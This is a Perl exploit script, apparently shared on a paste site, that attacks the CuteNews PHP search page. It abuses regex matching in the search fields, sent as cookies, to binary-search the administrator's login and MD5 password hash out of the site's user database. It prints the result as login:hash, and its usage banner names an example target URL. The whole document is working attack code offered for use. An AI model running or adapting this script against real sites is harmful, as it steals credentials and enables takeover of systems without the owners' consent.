31337 sploet

1. #!/usr/bin/perl
2. &usage unless $ARGV[0];
3.  
4. use strict;
5. use LWP;
6. use utf8;
7. use Encode qw( decode );
8.  
9. $| = 1;
10.  
11.  
12.  
13. # main
14. my $search_page_url = URI->new($ARGV[0]);
15. my $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36';    # common user agent string
16. my ($login, $md5hash);
17. $search_page_url->query_form([  'dosearch' => 'yes',
18.                                 'user' => '1',
19.                                 ]
20.                             );
21.  
22.  
23.  
24.  
25.  
26. # try the 'admin' login
27. print STDERR "[Getting login]\n";
28. {
29.     print STDERR "Checking if there exists account named 'admin'... ";
30.  
31.     if (&login('^admin$')){
32.         $login = 'admin';
33.         print STDERR 'yes!';
34.     } else {
35.         print STDERR 'no.';
36.     }; 
37.     print STDERR "\n";
38. }
39.  
40.  
41. # bruteforce [a-zA-Z0-9] login if not 'admin'
42. unless ($login){
43.     print STDERR 'Finding login... ';
44.  
45.     my $tmp = '';
46.     # check if login length is in 1-64
47.     die "\n", 'Can\'t find suitable account.' unless &login('^[a-zA-Z0-9]{1,64}$');
48.  
49.     until( &login("\^${tmp}\$")) {
50.         $tmp .= &binary_search($tmp, 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', \&login);
51.         print STDERR "\rFinding login... $tmp";
52.     }
53.     print STDERR "\n";
54.     $login = $tmp;
55. }
56. die '...' unless $login;
57.  
58.  
59.  
60.  
61.  
62. # bruteforce md5 hash
63. print STDERR "\n[Getting password hash]\n";
64. {
65.     my $tmp = '';
66.  
67.     while( length($tmp) != 32) {
68.         $tmp .= &binary_search($tmp, 'abcdef0123456789', \&password);
69.         print STDERR "\r$tmp";
70.     }
71.     print STDERR "\n";
72.     $md5hash = $tmp;
73. }
74. die "..." unless $md5hash;
75.  
76.  
77.  
78. print STDERR "\n[Output]\n";
79. print "$login:$md5hash\n";
80. exit;
81.  
82.  
83.  
84.  
85.  
86. # can be upgraded to turn strings like abcdef into [a-f]
87. sub binary_search{
88.     my ($part, $symbols, $req) = @_;
89.  
90.     print STDERR substr($symbols, int(length($symbols)/2), 1);
91.  
92.     while (length($symbols) != 1){
93.         my $tmp = substr($symbols, 0, int(length($symbols)/2));
94.         if ($req->("^${part}[$tmp]")){
95.             $symbols = $tmp;
96.         } else {
97.             $symbols = substr($symbols, int(length($symbols)/2));
98.         }
99.     print STDERR "\b", substr($symbols, int(length($symbols)/2), 1);
100.     }
101.     return $symbols;
102. }
103.  
104.  
105.  
106. sub password{   # apply regex from $_[0] to $login's md5-hash and parse response
107.     my $url = $search_page_url->clone;
108.     $url->query_form(   ($url->query_form,
109.                         'files_arch[]' => 'data/users.db.php',
110.                         'title' => $login,
111.                         'story' => "(?=^[a-z0-9]{32}\$)$_[0]",  # (?=..) to match only vs hash, not nickname. check app source code
112.                                                                 #if(@preg_match("/$story/i", *nickname*) or @preg_match("/$story/i", *hash*)
113.                         )
114.                     ); 
115.  
116.     my $response = &do_REQ($url);
117.    
118.     return &parse_response($response); 
119. }
120.  
121.  
122.  
123. sub login{  # apply regex from $_[0] to login and parse response
124.     my $url = $search_page_url->clone;
125.     $url->query_form(   ($url->query_form,
126.                         'files_arch[]' => 'data/users.db.php',
127.                         'title' => $_[0],
128.                         )
129.                     ); 
130.  
131.     my $response = &do_REQ($url);
132.    
133.     return &parse_response($response); 
134. }
135.  
136.  
137.  
138. sub usage{
139.     print STDERR '      _   _ _______        ______  
140.  ___| \ | | ____\ \      / / ___|
141. / __|  \| |  _|  \ \ /\ / /\___ \
142. | (__| |\  | |___  \ V  V /  ___) |
143. \___|_| \_|_____|  \_/\_/  |____/
144.  ___ ____   __  
145. / _ \___ \ / /_  
146. | | | |__) | \'_ \
147. | |_| / __/| (_) |
148. \___/_____|\___/
149.  
150. This program exploits vulnerability in CuteNews php script and gives you administrator login and md5-hashed password.
151.  
152. Note: you can redirect stdout to file to get credentials in form login:hash. Stderr will be used for status updates.
153.  
154. Example of usage:
155.     perl ', $0, ' http://rdot.org/cnews/search.php >creds.txt';
156.  
157.     exit;
158. }
159.  
160.  
161.  
162. sub parse_response{
163.     my $response = decode('cp1251', $_[0]);
164.  
165.     die "Can't parse response!" unless $response =~ m{Найдено <b>\[(\d+)\]</b> статей:};
166.  
167.     return $1;
168. }
169.  
170.  
171.  
172. my $browser;
173. sub do_REQ {
174.     unless ($browser){
175.         $browser = LWP::UserAgent->new(('agent' => $user_agent));
176.         $browser->timeout(30);
177.     }
178.     # since rg==on always, turn all GET params 2 COOKIE
179.     my $url = URI->new($_[0]);
180.     my $params = $url->query();
181.     $params =~ s/&/; /g;
182.  
183.     $url->query_form('');
184.     my $resp = $browser->get($url, ('Cookie' => $params));
185.  
186.     die "Failed making request" unless $resp->is_success;
187.  
188.     return ($resp->content, $resp->status_line, $resp->is_success)
189.         if wantarray;
190.  
191.     return unless $resp->is_success;
192.     return $resp->content;
193. }